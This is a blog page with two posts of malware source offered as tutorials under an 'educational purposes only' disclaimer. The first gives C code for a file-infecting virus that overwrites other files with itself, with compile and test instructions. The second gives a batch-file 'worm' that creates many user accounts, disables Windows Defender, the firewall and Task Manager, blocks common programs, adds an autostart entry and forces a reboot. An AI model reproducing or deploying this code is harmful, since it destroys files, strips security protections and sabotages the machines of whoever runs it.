WARNING: ALL THE INFORMATION PROVIDED IN THIS POST ARE FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR ANY MISUSE.

Monday, 19 September 2011

How to Create a Computer Virus

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.


#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it
 WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE

Saturday, 17 September 2011

How to make the bulldog worm virus

Hello friends i am going to show you how to make a bad virus for windows
first open notepad
than type this code shown bellow
when down typing than save as bulldogwors.bat
Pls dont open in your own computer



@echo off
taskkill -f -im explorer.exe
copy virus.bat C:\windows\
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
net user hhthhy virus /add
net user roc13xtyh virus /add
net user roc13x123 virus /add
net user roc13x1 virus /add
net user roc13x12 virus /add
net user roc13x2 virus /add
net user roc13x3 virus /add
net user roc13x4 virus /add
net user roc13x5 virus /add
net user roc13x6 virus /add
net user roc13x7 virus /add
net user roc13x8 virus /add
net user roc13x9 virus /add
net user roc13x0 virus /add
net user roc13x10 virus /add
net user roc13x10 virus /add
net user roc13x12 virus /add
net user roc13x2 virus /add
net user roc13x1 virus /add
net user roc13x2 virus /add
net user roc13x34 virus /add
net user roc13x34 virus /add
net user roc13x33 virus /add
net user roc13x343 virus /add
net user roc13x45 virus /add
net user roc13x00 virus /add
net user roc13x000 virus /add
net user roc13x0000 virus /add
net user roc13x00000 virus /add
net user roc13x000000 virus /add
net user roc13x0000000 virus /add
net user roc13x00000000 virus /add
net user roc13x000000000 virus /add
net user roc13x0000000000 virus /add
net user roc13x00000000000 virus /add
net user roc13x000000000000 virus /add
net user my comp /delete
mkdir %userprofile%\desktop\virus3000 njhjkhjkh
mkdir %userprofile%\desktop\virus3000hjhkhhjkhj
mkdir %userprofile%\desktop\virus3000jjjkjjj
mkdir %userprofile%\desktop\virus3000jhh
net stop "security center"
net stop "sharedaccess"




net stop "windows defender"
netsh firewall set opmode mode = disable
del "%userprofile%\desktop\internet explorer"
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\run /hate /d C:\windows\bulldog worm.bat
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system /v DisableTaskMgr /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer /v NoClose /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\Di
­sallowRun
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer /v DisallowRun /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\Di­sallowRun /v 1 /d iexplore.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\Di­sallowRun /v 2 /d notepad.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\Di­sallowRun /v 3 /d wordpad.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\Di­sallowRun /v 4 /d wmplayer.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\Di­sallowRun /v 5 /d msnmsgr.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\Di­sallowRun /v 6 /d avast.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\Di­sallowRun /v 7 /d help.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\Di­sallowRun /v 7 /d steam.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\Di­sallowRun /v 7 /d winmail.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\Di­sallowRun /v 7 /d outlook.exe
title VIRUS ALERT
color 04
echo A VIRUS HAS BEEN DETECTED ON YOUR COMPUTER AND WILL ERASE EVERYTHING!
shutdown -r

Related Posts Plugin for WordPress, Blogger...